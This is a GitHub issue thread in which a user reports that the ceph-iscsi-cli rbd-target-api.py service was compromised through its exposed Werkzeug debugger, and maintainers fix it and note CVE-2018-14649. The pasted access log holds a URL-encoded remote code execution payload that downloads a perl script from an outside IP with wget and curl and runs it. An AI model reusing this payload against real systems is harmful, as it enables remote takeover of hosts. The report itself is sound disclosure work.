Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

rbd-target-api.py exploited. #120

Closed
realasmo opened this issue Sep 23, 2018 · 7 comments
Closed

rbd-target-api.py exploited. #120

realasmo opened this issue Sep 23, 2018 · 7 comments

Comments

@realasmo
Copy link

Hello,

I've found that the python code was used to compromise our host remotely (in our case it was running as root so the attacker gained root privileges), the logs contains:

2018-09-23 05:23:53,267 INFO [_internal.py:87:_log()] - 185.234.217.11 - - [23/Sep/2018 05:23:53] "GET /console?s=7qfxpQm7KShU7OzAilrU&cmd=import+os%3B+os.system%28%27wget+-qO+-+http%3A%2F%2F195.22.126.16%2Fbt.txt%7Cperl%3Bcd+%2Ftmp%3Bcurl+-O+http%3A%2F%2F195.22.126.16%2Fbt.txt%3Bperl+bt.txt%3Brm+-rf+bt.txt%2A%27%29&__debugger__=yes&frm=0 HTTP/1.1" 200 -

Hope this helps.

@dillaman
Copy link

@realasmo Thanks for the report of the exposed Werkzeug exploit. I'll open a PR to fix it ASAP.

@realasmo
Copy link
Author

the end of the logfile contains __debugger__=yes, so this may (or may not) be related:

https://www.exploit-db.com/exploits/43905/

@dillaman
Copy link

Flask is enabling the Werkzeug debugger here [1]

[1] https://github.com/ceph/ceph-iscsi-cli/blob/master/rbd-target-api.py#L2007

@sidhax
Copy link

sidhax commented Sep 24, 2018

CVE-2018-14649 has been assigned for this flaw

@dillaman
Copy link

See PR #121

@dillaman
Copy link

Resolved -- also ceph/ceph#24248 includes a documentation update to note that this API should not be publicly accessible.

@abergmann
Copy link

CVE-2018-14649 was assigned to this issue.

See also rh#1632078 for additional information.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants